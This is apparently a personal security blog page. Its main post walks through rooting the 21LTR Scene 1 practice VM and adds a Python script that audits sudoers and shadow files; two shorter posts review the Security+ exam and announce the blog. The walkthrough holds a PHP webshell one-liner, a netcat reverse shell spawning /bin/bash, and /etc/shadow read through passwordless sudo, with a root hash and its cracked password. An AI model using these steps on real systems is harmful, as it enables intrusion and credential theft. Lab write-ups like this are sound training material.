December 16, 2016

21LTR: Scene 1 Walkthrough

Today I will write my "21 LTR:Scene 1" walkthrough from . You can download it here -
Two other write-ups are already available:

Firstly, g0tmi1k, thanks for this awesome source of fun! Secondly, I will show my steps to get in as a step-by-step list of commands, explanations and screenshots. Let's start.


1. Find out the vulnerable machine's IP: netdiscover -i vboxnet2
2. Let's scan for open ports: nmap -sS -A -p 1-65535
It is always important to check all TCP/UDP ports, because it is quite common for sysadmins to think that a port in the high range is a good defense. Security through obscurity! Here is the output:

3. I tried to log in to FTP with anonymous credentials - no luck. I ran to enumerate directories. Great tool, you can check it here - The tool found 3 directories with no valuable information in them. If you have a web page, always examine the source code. It can give you hints about software versions and sometimes really expands the attack surface. On I found this:
4. I used these credentials to log in to FTP. There I found the file backup_log.php. I tried to access this file via its URL and saw a page with recent backup reports.

At this moment I was stuck for a while. From my OSCP experience I remembered one valuable piece of advice: "Don't know what to do? Listen to what is going on on the wire." The only change I made was the IP. I used because I had seen it in the report.

5. I launched Wireshark and went for coffee. When I was back I saw this:

The victim tried to connect on port 10000. OK, let's launch nc -nlvp 10000.
After some period of time I saw some binary data received by nc. Before jumping down the rabbit hole with the received data, I immediately tried to connect to port 10001: nc -nv 10001. I got an empty shell with no output. It looked like the victim executed something on the machine and then opened port 10001 for a short period of time to receive the results.

6. I tried to insert commands without success, but then I executed backup_log.php one more time and saw this:

Let's try to insert a PHP one-line webshell: <?php echo exec($_GET["cmd"]);?>
I always prefer to use a reverse shell when possible, so I can navigate the vulnerable machine without inconvenience. Let's try netcat with the -e option: -nlvp 2608 -e /bin/bash

7. We are in! We have apache privileges. Not too much really. Let's spawn a full shell using python -c 'import pty;pty.spawn("/bin/bash")'. By the way, here is an excellent cheat sheet on how to spawn a shell using different languages -
Privilege escalation is always a tricky thing. I often start with enumeration and then go for kernel exploits. For enumeration I recommend this article from g0tmi1k -
For exploitation attempts you can try this Perl tool - It is quite accurate.

8. During enumeration I found an archive in /tmp - backup.tar.gz. After the first decompression I found media/backup/pxelinux.cfg.tar.gz in it. Let's see what we have in /media. USB_1 sounded like an attached USB key. There I found an SSH private key, located in /media/USB_1/Stuff/Keys. I also enumerated the users in the /home folder.

9. I copied the id_rsa key and tried to brute-force SSH using the usernames from /home and the copied key. I was lucky with hbeale. My next step is always to run sudo -l. It saves so much time. Here I found that I can run cat with no password check. I tried cat /etc/shadow and got the hash of the root password - $1$VW5E9DmD$deoML8uqU/4HaTmNmfM7G1. I ran john with the rockyou dictionary to find the password. 3 seconds later I found that the password was "formula1".

Using su and the password I got root privileges. Done!
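As an added defensive example (not part of the original walkthrough), here is a small Python audit that flags the two misconfigurations that let this box fall: a NOPASSWD sudo entry for a file-reading binary such as cat, and an md5crypt ($1$) root hash of the kind john cracked in seconds. The sudoers and shadow samples are constructed; only the root hash is the one quoted above.

```python
import re

FILE_READERS = {"cat", "less", "more", "head", "tail"}  # cat is from the box; the rest are assumed equivalents
WEAK_SCHEMES = {"$1$": "md5crypt"}  # salted MD5, 1000 rounds: john + rockyou cracked it in 3 s

# constructed sample sudoers; hbeale's line mirrors "I can run cat with no password check"
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
hbeale  ALL=(ALL) NOPASSWD: /bin/cat   # hands /etc/shadow to anyone holding hbeale's key
backup  ALL=(root) /usr/bin/rsync, NOPASSWD: /bin/tar
"""
# constructed sample shadow; the root hash is the one quoted in the walkthrough
SAMPLE_SHADOW = """\
root:$1$VW5E9DmD$deoML8uqU/4HaTmNmfM7G1:17000:0:99999:7:::
hbeale:$6$saltsalt$constructedsha512crypthash:17000:0:99999:7:::
"""

# user  host=(runas) commands   (runas part is optional and defaults to root)
USER_SPEC = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")

def parse_sudoers(text):
    """Yield (user, runas, nopasswd, command) per command of each user-spec line.
    A NOPASSWD:/PASSWD: tag applies to the command it prefixes and all that follow it."""
    for line in text.splitlines():
        m = USER_SPEC.match(line.split("#", 1)[0].strip())  # drop comments and blanks
        if not m or m.group(1) == "Defaults":
            continue
        user, runas, nopasswd = m.group(1), m.group(2) or "root", False
        for cmd in m.group(3).split(","):
            cmd = cmd.strip()
            for tag in ("NOPASSWD:", "PASSWD:"):
                if cmd.upper().startswith(tag):
                    nopasswd = tag == "NOPASSWD:"
                    cmd = cmd[len(tag):].strip()
            if cmd:
                yield user, runas, nopasswd, cmd

def audit_sudoers(text):
    """Return (user, runas, command) for passwordless commands that can read any file."""
    return [(u, r, c) for u, r, np, c in parse_sudoers(text)
            if np and c.split()[0].rsplit("/", 1)[-1] in FILE_READERS]

def audit_shadow(text):
    """Return (account, scheme) for every password hash stored with a weak scheme."""
    weak = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) > 1 and fields[1][:3] in WEAK_SCHEMES:
            weak.append((fields[0], WEAK_SCHEMES[fields[1][:3]]))
    return weak
```

On a real host feed it the contents of /etc/sudoers (plus /etc/sudoers.d/*) and /etc/shadow; the fix for both findings is to drop the NOPASSWD entry and rehash root's password with sha512crypt or yescrypt.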

Lessons Learned

The key to this machine is understanding how to use port 10001. Without passive reconnaissance you won't be successful. It is also essential to dig into and enumerate the accessible folders on the machine. Examining each folder can be boring, but you can also automate this using tools from here -

Good luck in your research and mastering!

October 26, 2016

CompTIA Security+ certification review


   I will start my certification story with Security+. At the beginning of 2015 my wife and I decided to relocate from Russia to somewhere in Europe, because technical security jobs in my city are in low demand, with pretty shit salaries by the way. So one of the first steps for us was to convert my knowledge into something more recognizable all around the world. I read some reviews of different certifications and decided to start with CompTIA Security+. I knew that this certification is an entry-level one for security, so it didn't take much time to prepare. Another important reason was that English is not my native language, so I wanted to get a feel for enterprise security terms and approaches.
   I have quite weird thoughts about the certification process itself. It is not rare that a certification is used not for proving skills, but just to move up the career ladder regardless of what you know and your abilities. That is why I am a big fan of the Offensive Security guys, their approach and frustration. Obviously for Security+ you can easily google dumps, but if you don't understand the actual material you will struggle a lot in the future. By the way, the price of around $300 is quite challenging in Russia, so I decided to pass the exam myself, as I did before at school and university. I was always bad at the "copy-paste" way.
   I examined the CompTIA site and found more details about the themes:
  • Network Security - 21%
  • Compliance and Operational Security - 18%
  • Threats and Vulnerabilities - 21%
  • Application, Data and Host Security - 16%
  • Access Control and Identity Management - 13%
  • Cryptography - 11%
All questions were divided into these categories. 90 questions/90 minutes to complete the exam. 900 points maximum, 750 to pass. Let's prepare.


There were 2 books for Security+ preparation:

Both books were excellent preparation guides. Let's dig in a bit. The topics were quite similar, so I will speak about both books in general.
  1. Network Security. Here you will find the whole variety of topics about firewalls, IPS/IDS, VLAN, DMZ, NAT, protocols from different layers of the TCP/IP stack, etc. In the exam most of the questions in this domain would be about port numbers and associated protocols, effective security measures to lock down security at the network level, and wireless security.
  2. Compliance and Operational Security. This part is quite boring and annoying, but I can't help mentioning that these topics will be very helpful when you decide to ask for a security budget increase or to buy a new fancy useless security toy=) Disaster recovery, backup plans, incident response, risk management - understanding all these topics would be handy for speaking with the business. More interesting to read about are physical security and security administration. Remember all the abbreviations, what they mean and how technical stuff influences them.
  3. Threats and Vulnerabilities. I think the most interesting topic in both books. You will dive into malware classification, application and general attacks, and social engineering. Most questions from this category would be about choosing the best way to mitigate some threat or to distinguish one threat from another.
  4. Access Control and Identity Management. Here you will deal with authentication/authorization (802.1x, port security, RADIUS, etc.), host-based security software, and ways to improve security on endpoints. Most questions would be about how to implement these features to address a specific threat in the most effective way.
  5. Cryptography. Key concepts of symmetric and public key cryptography, hashing, the most common protocols, their limitations and recommended parameters to use. Network protocols which use cryptography heavily would also be described: IPSec, TLS, HTTPS, etc.


   My review would not be really complete without my impression of the exam. Actually it was not too bad. CompTIA gives you various situations and asks for the best solution in each situation. 2 out of 4 answers were quite stupid, but to choose the right one you will probably need to think a bit. It was all about choosing the best variant. You need to keep 2 parameters from the situation in your head to make the right choice. You can also find performance-based questions, which were far away from practice. In one question you will probably find parts from different domains. For question examples, have a look at the samples in the books above.
   I spent 2 weeks preparing for this exam. I took it in a PearsonVue center. I used about 60 minutes to achieve 880/900; probably I missed 1 or 2 questions. My first step towards relocation was made.


This exam can prove your entry-level understanding of security. It is not a hard technical exam, more situation-based. Obviously, a good university would provide all the necessary background to pass this exam quickly. If you are looking for a Level 1 position or your first infosec job it is a good choice. With my current level of experience and knowledge I would not bother to recertify after expiration.

October 17, 2016

Share is fun!

   A lot of things have happened since my last blog post. During the last 2 years I could not find time to write a blog post=) Lie! However, now my wife and I are raising 2 beautiful kids and we teach them that "share is fun". As you know, in order to set the best example for kids you need to follow your own words. Let's get it started!

   I have a lot of material to share in my blog. I will try to write frequently, at least 2 times a week. I am going to cover different things:

  • my experience of passing Security+, CEH, OSCP, OSWP, OSCE and SANS GXPN. I also hope to achieve SANS GREM and SLAE this year, so probably I will cover them too.
  • talk about Info Sec books, blogs and other resources I use to broaden my knowledge. Unfortunately, there are not too many really good resources and books, so I will try to cover them.
  • describe interesting stuff that I face on my way in Info Sec. I am not going to copy/paste the excellent materials from Corelan, FuzzySecurity, etc., but I am going to explain moments that were not clear to me during reading and which I spent some time researching.
  • create a series of articles regarding Linux exploitation and some other things that are not clearly described on the Internet. Before starting something like this I will carefully examine the available resources in order not to reinvent the wheel.

My main goal for this blog is to make it unique, interesting to read and valuable for different folks in the Info Sec field.